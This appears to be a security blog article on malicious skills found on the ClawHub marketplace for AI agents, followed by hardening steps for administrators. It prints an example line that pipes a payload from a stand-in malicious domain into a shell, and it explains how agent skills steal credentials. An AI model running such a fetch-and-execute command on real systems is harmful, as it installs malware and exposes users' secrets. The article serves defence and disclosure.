ClawHub: 341 Malicious Skills Discovered on the OpenClaw Marketplace

In early February 2026, security researchers from Snyk and Koi Security revealed the existence of 341 malicious skills on ClawHub, OpenClaw's official marketplace. This discovery shines a light on a new category of threat: supply chain attacks targeting AI agents. With components capable of executing code autonomously and accessing credentials, the consequences go far beyond anything we had seen with compromised npm or PyPI packages.

Here is a detailed look at the incident, how it works under the hood, and the concrete measures you can put in place to protect your infrastructure.

Timeline of the ClawHub incident

The case began on February 2, 2026, when Luca Beurer-Kellner, a security engineer at Snyk, identified the first suspicious skills on ClawHub. The security audit that followed covered 2,857 skills listed on the platform, revealing that 341 of them contained malicious code.

The most striking detail: between January 27 and February 1, 2026, more than 230 malicious plugins were published in a single week. The attacker, identified under the alias "sakaen736jih", submitted new skills every few minutes through a fully automated process. This industrial publishing pace points to a carefully prepared, systematic attack.

Later, the Bitdefender AI Skills Checker tool widened the scope of the analysis and identified roughly 900 malicious skills in total on the platform, a figure considerably higher than the initial estimate.

How the attack works technically

The main attack vector relies on obfuscated shell scripts embedded in OpenClaw skills. Disguised as legitimate components, these scripts run hidden commands when the skill is installed or activated by the AI agent.

The case of the "clawhub" skill

The most downloaded skill in this campaign, named simply "clawhub", racked up 7,743 downloads. It presented itself as the platform's official CLI tool, a classic typosquatting technique adapted to the AI agent ecosystem. Once installed, it triggered the download of Atomic Stealer, a macOS-specific malware sold for between 500 and 1,000 dollars per month on underground forums.

Atomic Stealer is an infostealer capable of exfiltrating:

• Passwords stored in the macOS Keychain
• Browser session cookies
• Cryptocurrency wallets
• Sensitive system files
• Authentication tokens and API keys

Typical execution pattern

Here is a simplified example of the obfuscation pattern used in the compromised skills:

# Typical pattern found in malicious skills (simplified)
# The real script uses multiple layers of base64 encoding and eval
curl -fsSL https://malicious-domain[.]com/payload.sh | sh

# The downloaded payload installs Atomic Stealer
# and establishes persistence via a LaunchAgent on macOS

What sets this attack apart from classic supply chain compromises: the AI agent running the skill often has direct access to the user's credentials (API keys, tokens, environment variables) and an autonomous execution capability. The agent does not ask for confirmation before running the skill's code, which makes exploitation silent and immediate.

Parallels with npm and PyPI attacks

The techniques used on ClawHub are not new in themselves. They reuse patterns well documented in the npm and PyPI ecosystems:

• Typosquatting: package names that closely resemble popular legitimate components
• Package abandonment: taking over packages abandoned by their original maintainers
• Malicious updates: injecting code into updates of previously legitimate skills
• Automated publishing: mass submission to overwhelm review mechanisms

What fundamentally changes with AI agents is the level of privilege. A malicious npm package runs in the developer's context. A malicious OpenClaw skill runs in the context of an autonomous agent that potentially has access to third-party APIs, databases, file systems, and even entire cloud infrastructures.

Bitdefender's report also points out that 135,000 OpenClaw agents were exposed to the internet at the time of the discovery. That is a huge number of potential entry points for an attacker who manages to compromise a popular skill.

Why AI agent marketplaces are particularly vulnerable

Several structural factors explain why marketplaces like ClawHub represent a critical attack surface:

1. No systematic code review

Unlike mobile app stores, which enforce a validation process (however imperfect), most AI skill marketplaces operate on an open model. Anyone can publish a skill, and validation rests essentially on community trust and after-the-fact reporting.

2. Execution with elevated privileges

AI agents need access to the file system, the network, and credentials in order to function. A compromised skill automatically inherits those privileges. In most default configurations, there is no granular sandboxing between skills.

3. Implicit chain of trust

The user trusts the agent, which trusts the marketplace, which trusts the publisher. This transitive chain of trust is exactly what attackers exploit.

4. Audit complexity

Skills can contain obfuscated code, dynamic network calls, and payloads loaded at runtime. Static analysis is not enough, and dynamic auditing at the scale of thousands of skills exceeds the capacity of most security teams.

Protection measures for administrators

In the face of this threat, here are concrete actions to put in place immediately if you use OpenClaw or any other AI agent with a skills/plugins system.

Audit installed skills

Start by listing all currently installed skills and verifying their provenance:

# List installed OpenClaw skills
openclaw skills list --verbose

# Verify the checksums of installed skills
openclaw skills verify --all

# Search for skills known to be malicious
openclaw skills audit --database=snyk-advisory-2026-02

Isolate agents in containers

The most effective measure is to run your AI agents in isolated Docker containers with minimal permissions. This greatly limits the impact of a compromised skill:

# Run OpenClaw in an isolated container
docker run -d \
  --name openclaw-agent \
  --network=none \
  --read-only \
  --tmpfs /tmp:size=100m \
  --cap-drop=ALL \
  --security-opt=no-new-privileges \
  -v /path/data:/data:ro \
  openclaw/agent:latest

# Verify the container has no unauthorized network access
docker exec openclaw-agent curl -s https://example.com && echo "ALERT: unrestricted network access"

To dig deeper into containerizing your services, see our complete Docker tutorial.

Set up an application firewall

Restrict your AI agents' outbound communications to the bare minimum:

# With UFW, allow only the required APIs
sudo ufw default deny outgoing
sudo ufw allow out to 104.18.0.0/16 port 443  # Authorized APIs
sudo ufw allow out to any port 53              # DNS
sudo ufw reload

# Check the active rules
sudo ufw status verbose

Our guide on configuring UFW details network filtering best practices.

Monitor for suspicious behavior

Set up active monitoring of the processes launched by your agents:

# Monitor child processes of the OpenClaw agent
watch -n 5 "ps aux | grep -E 'openclaw|claw' | grep -v grep"

# Detect suspicious network connections
ss -tnp | grep openclaw

# Configure auditd to trace executions
sudo auditctl -a always,exit -F arch=b64 -S execve -F uid=$(id -u openclaw) -k openclaw_exec

# Review the audit logs
sudo ausearch -k openclaw_exec --start recent

Apply the principle of least privilege

Create a dedicated system user with minimal permissions to run your agents:

# Create a dedicated user without an interactive shell
sudo useradd -r -s /usr/sbin/nologin -d /opt/openclaw openclaw-agent

# Restrict access to sensitive files
sudo chmod 700 /opt/openclaw
sudo chown -R openclaw-agent:openclaw-agent /opt/openclaw

# Block privilege escalation attempts
echo "openclaw-agent ALL=(ALL) !ALL" | sudo tee /etc/sudoers.d/openclaw-deny

Toward structural security for AI agent ecosystems

The ClawHub incident reveals a deeper problem: AI agent ecosystems are repeating the mistakes of traditional package managers, but with potentially far more serious consequences.

Several avenues for structural security deserve to be explored:

• Mandatory cryptographic signing of skills by verified publishers
• Automated static and dynamic analysis before publication on the marketplace
• Native sandboxing at the agent runtime level, with declarative per-skill permissions
• A reputation system based on community auditing and automated analysis
• Network isolation by default for unverified skills

Initiatives such as NanoClaw already offer a more secure approach to deploying AI agents, with built-in sandboxing and a reduced attack surface. It is a promising direction that the entire ecosystem should follow.

Key takeaways for AI agent security

The ClawHub attack is probably only the beginning of a wave of supply chain attacks targeting AI agents. As these tools become widespread in the enterprise, they become increasingly attractive targets for attackers.

The main lessons from this incident:

1. Never blindly trust a marketplace. Even an official marketplace can host malicious components for weeks before detection.
2. Isolation is your best defense. Containerization, restricted networking, a dedicated user: each layer of isolation reduces the impact of a compromise.
3. Audit your dependencies regularly. Use tools like the Bitdefender AI Skills Checker or the Snyk databases to check your installations.
4. AI agents are not ordinary users. Their autonomous execution capability demands proportionate security controls.
5. Monitor behavior, not just signatures. Obfuscation makes static analysis insufficient. Behavioral detection (unusual network connections, suspicious executions) is essential.

For a broader view of the risks tied to AI agents and the strategies to mitigate them, see our dedicated article on AI agent security.

Conclusion

The discovery of 341 malicious skills on ClawHub by Snyk and Koi Security researchers is a wake-up call for the entire AI agent ecosystem. With 900 suspicious skills identified in total by Bitdefender and 135,000 agents exposed to the internet, the scale of the attack surface is considerable.

The techniques used (typosquatting, automated publishing, payload obfuscation) are classic, but the execution context is radically different: autonomous agents with direct access to credentials and the ability to run code without human supervision. This combination makes AI skill marketplaces a prime target for the next supply chain attack campaigns.

The response must be both immediate (audit and isolate your current agents) and structural (demand robust verification mechanisms from the platforms). AI agent security is no longer a theoretical topic: it is an operational imperative.